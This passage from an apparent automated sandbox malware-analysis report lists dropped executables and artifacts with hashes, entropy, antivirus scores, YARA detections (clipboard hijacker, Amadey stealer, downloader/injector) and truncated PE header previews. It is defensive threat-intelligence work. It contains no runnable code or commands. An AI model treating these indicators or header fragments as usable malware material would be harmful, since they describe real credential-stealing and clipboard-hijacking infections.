                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e..e!.6!.6!.6..'6 .6N.!65.6N..6N.6N..6..6(.,6".6!.6].6N..6 .6N.%6 .6N."6 .6Rich!.6........................PE..L...i..c.................>....t......R.......P....@..........................`u.............................................DB..(....`t.x............................................................4..@............................................text....<.......>.................. ..`.data...8.r..P.......B..............@....wida........@t......>..............@....rsrc...x....`t......V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):9728
                                                                                                  Entropy (8bit):5.3362059272001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                  MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                  SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                  SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                  SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, Author: unknown
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\aafg31.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28672
                                                                                                  Entropy (8bit):0.43613063485556663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:TLqlUIFnGP6Gkwtwhg4FdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0u9z3:TLqlj1czkwubXYFpFNYcw+6UwcYzHr
                                                                                                  MD5:46076967A4692D6323BCBDAD8532DA6A
                                                                                                  SHA1:A2C61F0EAECF8C2D126FCF82828808B78291E582
                                                                                                  SHA-256:BFA77719DCA9C4C92B38BD8A23C9DD751B82DB0F21620E6937C4F97AECC5536B
                                                                                                  SHA-512:B4C03F075B2E4DC527AD25B5D5788BE55D4CBCCA66002884CC75528FC57AF54C494B2219C726999E9A29C5AB05C789DB1412F4A01A8AC61726E2F7B785E77691
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\E3B7.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):425
                                                                                                  Entropy (8bit):5.340009400190196
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                  MD5:CC144808DBAF00E03294347EADC8E779
                                                                                                  SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                                  SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                                  SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):985
                                                                                                  Entropy (8bit):5.225141189452099
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:YqHZ6T06MhmimH6CUXyhm/mYbNdB6hmUmYz0JahmDmYbxdB6hm1mY7KTdB6hmuXA:YqHZ6T06McLHDUXyceYbNdUcZYz0Jack
                                                                                                  MD5:094FB5672ED4D4990DF33BE15CE2CB40
                                                                                                  SHA1:2BF77D89C6637F478893D63DFC809808C835A839
                                                                                                  SHA-256:19FEE75854625F0D51FE350049FE33EB16CB40E728C9BAADB232CA3E449DECA3
                                                                                                  SHA-512:A542CF7E0BE301B8BB2E369B0750D0C93941E02D044BFA840A28FBBEDD3F3EAF2D4E0F01ED0B3F836C916D0F0B79EEDD084DBE941A6424947C4EFE87AF38B304
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3031678576,"LastSwitchedHighPart":30840569,"PrePopulated":false},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4008173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3998173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3988173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3968173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3958173792,"LastSwitchedHighPart":30747923,"PrePopulated":true}]}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348672
                                                                                                  Entropy (8bit):7.184133278122481
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:Rre2Ofp8rQ5BJiHnx/PFy0nrFh4QtcOE1+GayRx9K4o78EZm:Ri1f+8jJSty07sp7HJ+
                                                                                                  MD5:B7133C4070082747C60BF6191A5F70DE
                                                                                                  SHA1:A7568A93D9DC79A211270736C5989C5F6635E9B6
                                                                                                  SHA-256:A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9
                                                                                                  SHA-512:F3DD85289894E9DDFD61D1D5B5CB479B97D7E0759327236B72150D22B790A2492BD4929D8427AAC50B48ED6E7E18ABCCBE401CB7D5F5DEB683E8C813AFBB72FE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e..e!.6!.6!.6..'6 .6N.!65.6N..6N.6N..6..6(.,6".6!.6].6N..6 .6N.%6 .6N."6 .6Rich!.6........................PE..L...i..c.................>....t......R.......P....@..........................`u.............................................DB..(....`t.x............................................................4..@............................................text....<.......>.................. ..`.data...8.r..P.......B..............@....wida........@t......>..............@....rsrc...x....`t......V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9728
                                                                                                  Entropy (8bit):5.3362059272001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                  MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                  SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                  SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                  SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, Author: unknown
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):562
                                                                                                  Entropy (8bit):6.001557934994266
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:YGJ68NxQprVXHRN7ddO1+MZ+cTWrL5MLlWx+52wVu:YgJcrtf10xTWyWgs7
                                                                                                  MD5:F325496CFFF70D09621BA8FED290F27A
                                                                                                  SHA1:667F342BFCBC58C1B38075CACDCBCB456DF71554
                                                                                                  SHA-256:8D137E1370E272BF84A53285861FE3F1449CD37854E8C9A5D17DF49A361EF64D
                                                                                                  SHA-512:336623AAADF8CE3315FBF0C8810B9CCE01761F265E0430DE0D8DE9C54617326E7B85D9B9BFD95FF3928401045687677276185200B9052B3357D65726150B2772
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wlRVLpC+KBvsdEYyXlc\\n5f6QXptA0rCkd8uUOFYrIygRUE6vzZQIULuUbrnh+taX+W3tSt3trPrO\/yMX\/SUp\\nxx00RhW9\/lhEcTS8HjvmwbYFgOojPJp3sk2dqHw9z\/sWxemMRhYoX\/UHr3yriIzO\\nvHFXW1\/YsXcFRq1aNbBcQ3eAwOqFIhH+JZA8eOQIsq4ooqUo06H0ZY\/9CHoeL5Gv\\nIX1Xoj6vIGEuuhP3wZey9EEbh2st98KaoMeHe6vKnQeSfdoKMXwERM0RcmuFfwOL\\nJhMdHqrruki7VRWPag4H\/aZRStKBg1PHS+NmYIMuP4y33GX8+PQEh2KxRyTY7oE9\\n4wIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467"}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\aafg31.exe
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1440, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1505996
                                                                                                  Entropy (8bit):6.926798131279275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:SMaEt+i3Cnwdv6BvxB50NmwnurD7ce8BS2QPC7s79FTMlMm6G3JQuXOK0:SIoiP6B5B50N6sXQa7YTbwX+
                                                                                                  MD5:BC493352EEBA6F62BC5A241E3CAE7D6C
                                                                                                  SHA1:99B4B232660AF04D9B16C93B475A20A95C21ECBE
                                                                                                  SHA-256:720E9EBA2F739B728742BDA2CBE124B7000EF84B8FC22A526339DE9A8C80894C
                                                                                                  SHA-512:C3CB4ED66A4009CECD25DCB7DB3099CF739ADB69A1CC6104A38309701BED8188E9AE445BF24EAA50723A9BC9604F21FBD16FFA0E021A072686110149912FA247
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:......JFIF.............C....................................................................C.........................................................................8............................................c.........................!.."1A.2Q.#BRaq3br............$4CS...c....%s.....&5DTd..'6EUet....7F.....................................>......................!.1.A..."2Qa.#3q..B....$4...C.DRr.b..............?....{.e..#y.|..,....P.b...?...'(..+....#.....B....:,9=.o5..,.b...M:,rP.w....<.C1......&.....lP....OrP.rZ....P,M.y"...,.....@X..oD..@;: ,......$...P.p.....pg....:.<.......;...8..B.......)..,........a.. ..!.!0..r.P..*.....f.....O..t*...o.'...[.....o`h..4.m|,..G....<<0@.?.F.*R7Sd...e.@.._.@...j..FGy.,..{..0.X..6.h7...E..wF..r..nl.Yp....o....j`..T...Y].7.m.J.a....g..@..,..<L.TD.Ra...u.....BS.\......+><{N8.rA....G..#....n.....F......|#.;....Bs..n6....a..|..5d...g..|.w.4...}...I|....S..>........aRW;~g..y.I4_)....)...(v.w.............]2.k}>P...^...|..=.c.u...V
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):743936
                                                                                                  Entropy (8bit):7.781844713340703
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:W6Iqcdp38PQDjxTCiP94TLVV7LlIuMZYxY/rUHJAUFIO0O4NJJFX4ys9:WPdp3fnAiV4fD6yY/WB8F
                                                                                                  MD5:4572249F67834C8222082D82DA18A797
                                                                                                  SHA1:2566A812851488EE24D4A353D0C258F56DBB6272
                                                                                                  SHA-256:BCC44AC5B9DDD75AC95AC942006C3A3B0CB2207DDA798DF5D37C538B42949100
                                                                                                  SHA-512:D9876312C8441A2FACADCC09EE97C3B99D3BF439A47D5A54AF227E94AADE8A3FE7D74E92BBDDFB2D42620A098C3511ABC0732C2556710C714FAD0A85AB0DEE10
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.M.v.#.v.#.v.#...w.#.....b.#.......#.....T.#.....u.#.v."...#.....w.#.....w.#.....w.#.Richv.#.................PE..L......b.................>....z......S.......P....@..........................p{......].......................................B..(.....z..............................................................5..@............................................text....<.......>.................. ..`.data.....y..P...*...B..............@....tipeg..D....pz......l..............@....rsrc.........z......p..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4531200
                                                                                                  Entropy (8bit):7.888380542499624
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:jUu64pByjFQ/1m2L4PkWjvsj9cSFzIcNO:TByJqm7Yc2zf
                                                                                                  MD5:4E40E00BE3370FB1F562B1E09E1275C1
                                                                                                  SHA1:083D017B2A7D25E643FFB14E81A49AFCC5E27470
                                                                                                  SHA-256:8A2E061B3B38DFF83F62982A6B0087E5C4EA1C47192BF0AC2F8F67397636B164
                                                                                                  SHA-512:94C7B158B3300B5AFA9128F30B62946775698E4C33518BDA2369A8737685F4016BC6C033F0096238876C909260A7FE92B1D79C953E357D1BBFB3BF9A950CF082
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\1543.exe, Author: ditekSHen
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.d..................E..........8E.. ...@E...@.. ........................E...........@.................................P8E.K....@E......................`E...................................................... ............... ..H............text.....E.. ....E................. ..`.rsrc........@E.......E.............@..@.reloc.......`E......"E.............@..B.................8E.....H........"E.\............'....D..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\oldplayer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):202752
                                                                                                  Entropy (8bit):6.344899274055935
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
                                                                                                  MD5:A64A886A695ED5FB9273E73241FEC2F7
                                                                                                  SHA1:363244CA05027C5BEB938562DF5B525A2428B405
                                                                                                  SHA-256:563ACABE49CC451E9CAAC20FAE780BAD27EA09AAEFAAF8A1DFD838A00DE97144
                                                                                                  SHA-512:122779AD7BCE927E1B881DF181FCC3181080D3929A67F750358FA446A21397B998D167C03AED5F3BDC3CD7A1F17E4DA095F9B4A9367C6357CABEFCF8CDD29474
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....+.d.................Z..........o;.......p....@..........................`............@.....................................d.... .......................0..p ..`...p...................t...........@............p...............................text....Y.......Z.................. ..`.rdata..t|...p...~...^..............@..@.data...h$..........................@....rsrc........ ......................@..@.reloc..p ...0..."..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):743936
                                                                                                  Entropy (8bit):7.781844713340703
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:W6Iqcdp38PQDjxTCiP94TLVV7LlIuMZYxY/rUHJAUFIO0O4NJJFX4ys9:WPdp3fnAiV4fD6yY/WB8F
                                                                                                  MD5:4572249F67834C8222082D82DA18A797
                                                                                                  SHA1:2566A812851488EE24D4A353D0C258F56DBB6272
                                                                                                  SHA-256:BCC44AC5B9DDD75AC95AC942006C3A3B0CB2207DDA798DF5D37C538B42949100
                                                                                                  SHA-512:D9876312C8441A2FACADCC09EE97C3B99D3BF439A47D5A54AF227E94AADE8A3FE7D74E92BBDDFB2D42620A098C3511ABC0732C2556710C714FAD0A85AB0DEE10
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.M.v.#.v.#.v.#...w.#.....b.#.......#.....T.#.....u.#.v."...#.....w.#.....w.#.....w.#.Richv.#.................PE..L......b.................>....z......S.......P....@..........................p{......].......................................B..(.....z..............................................................5..@............................................text....<.......>.................. ..`.data.....y..P...*...B..............@....tipeg..D....pz......l..............@....rsrc.........z......p..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):743936
                                                                                                  Entropy (8bit):7.781844713340703
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:W6Iqcdp38PQDjxTCiP94TLVV7LlIuMZYxY/rUHJAUFIO0O4NJJFX4ys9:WPdp3fnAiV4fD6yY/WB8F
                                                                                                  MD5:4572249F67834C8222082D82DA18A797
                                                                                                  SHA1:2566A812851488EE24D4A353D0C258F56DBB6272
                                                                                                  SHA-256:BCC44AC5B9DDD75AC95AC942006C3A3B0CB2207DDA798DF5D37C538B42949100
                                                                                                  SHA-512:D9876312C8441A2FACADCC09EE97C3B99D3BF439A47D5A54AF227E94AADE8A3FE7D74E92BBDDFB2D42620A098C3511ABC0732C2556710C714FAD0A85AB0DEE10
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.M.v.#.v.#.v.#...w.#.....b.#.......#.....T.#.....u.#.v."...#.....w.#.....w.#.....w.#.Richv.#.................PE..L......b.................>....z......S.......P....@..........................p{......].......................................B..(.....z..............................................................5..@............................................text....<.......>.................. ..`.data.....y..P...*...B..............@....tipeg..D....pz......l..............@....rsrc.........z......p..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):223232
                                                                                                  Entropy (8bit):6.703161955098334
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:n8B+VFhB9p54TzZmSt4VTXRctjbxEoovVwvTbkq4ZyLCL6/axp:o+bhPp54nZcXR2xEtvKX4EMR
                                                                                                  MD5:A7CC38586C03E1CEEB39E09BC99498A3
                                                                                                  SHA1:71CA49D9B47BD2419109EF6BC043D3831501558F
                                                                                                  SHA-256:DE87AC70CE4AFAAC9EDE74AC0A8169068841936830A24119E97EA3271A4BC8C9
                                                                                                  SHA-512:DEF49B3C644D6B8B6AB3FF21C6EB7A2F943CFAF3AF868070B3B6282118013840BB315899D7F6FEB1257D8E57D0046CDDFD8C6325A5AEC36A830A02D3155E8AC9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................].o......i......].......\......d.............X......m......j....Rich...........................PE..L....*.b.................@....r......T.......P....@...........................s..............................................C..<.....r.............................................................X6..@............................................text....>.......@.................. ..`.data....1q..P...>...D..............@....hes....D.....r.....................@....rsrc.........r.....................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):742400
                                                                                                  Entropy (8bit):7.782332279449587
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:0Qa2f+IfiStG/+51mT5x7EVEk1wnTjU+UBWyjsBzez84pZBy:0E+IfxtG/2Y5x7EVEk0TjUBpjsRIhp
                                                                                                  MD5:122E0DC413CD47850CB2C9547351D03C
                                                                                                  SHA1:6205E5A03AA803679C6A09E772B35F17EF4926C6
                                                                                                  SHA-256:A3B611FB81DD20251FC99C4B27C62DA4DD09E7401AB9B32E41BE3DA8AFCE379C
                                                                                                  SHA-512:29C5927B0F6F86EE8553646AE55558CA2D4948820FDC5D45D5A1499FF65FE3A2653E58738DDCDDF1D98A8AAE7DBFCB3E9D7546FDDCD0ABCF932C2DA54B4897C9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................].o......i......].......\......d.............X......m......j....Rich...........................PE..L...3..a.................@....z......T.......P....@..........................p{.............................................C..<.....z.............................................................X6..@............................................text....>.......@.................. ..`.data...x.y..P...*...D..............@....xoju...D....pz......n..............@....rsrc.........z......r..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):742400
                                                                                                  Entropy (8bit):7.782332279449587
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:0Qa2f+IfiStG/+51mT5x7EVEk1wnTjU+UBWyjsBzez84pZBy:0E+IfxtG/2Y5x7EVEk0TjUBpjsRIhp
                                                                                                  MD5:122E0DC413CD47850CB2C9547351D03C
                                                                                                  SHA1:6205E5A03AA803679C6A09E772B35F17EF4926C6
                                                                                                  SHA-256:A3B611FB81DD20251FC99C4B27C62DA4DD09E7401AB9B32E41BE3DA8AFCE379C
                                                                                                  SHA-512:29C5927B0F6F86EE8553646AE55558CA2D4948820FDC5D45D5A1499FF65FE3A2653E58738DDCDDF1D98A8AAE7DBFCB3E9D7546FDDCD0ABCF932C2DA54B4897C9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................].o......i......].......\......d.............X......m......j....Rich...........................PE..L...3..a.................@....z......T.......P....@..........................p{.............................................C..<.....z.............................................................X6..@............................................text....>.......@.................. ..`.data...x.y..P...*...D..............@....xoju...D....pz......n..............@....rsrc.........z......r..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):540672
                                                                                                  Entropy (8bit):7.649196286274833
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:zJJSNs2z8Jjpd/cbyGLRdODx8MfH9aNp2x:zas8Ijb0OGmx8Ms2
                                                                                                  MD5:3AD9B7B7F9A26EB7EF2B90D05FD4D8C5
                                                                                                  SHA1:15815B1DC656EE18D5DEF61E68F7AC98CE7D5B64
                                                                                                  SHA-256:FA662ADA7ED43968B6522BF2A00B3C707A17D091E324DB32EEC94FD0BF4FE131
                                                                                                  SHA-512:651C714531A5333F1DA6A7ABFD803838F852D3FA55E46FE67FE6880E23AC8A29342DB400770A092DB9A2AFFC4F3BAB1F0CA4260B9B57088864388582892E0B28
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................].o......i......].......\......d.............X......m......j....Rich...........................PE..L...R.}c.................@...xw......T.......P....@..........................`x......\.......................................C..<....pw.............................................................X6..@............................................text....>.......@.................. ..`.data.....v..P.......D..............@....jak....D....`w......Z..............@....rsrc........pw......^..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\explorer.exe
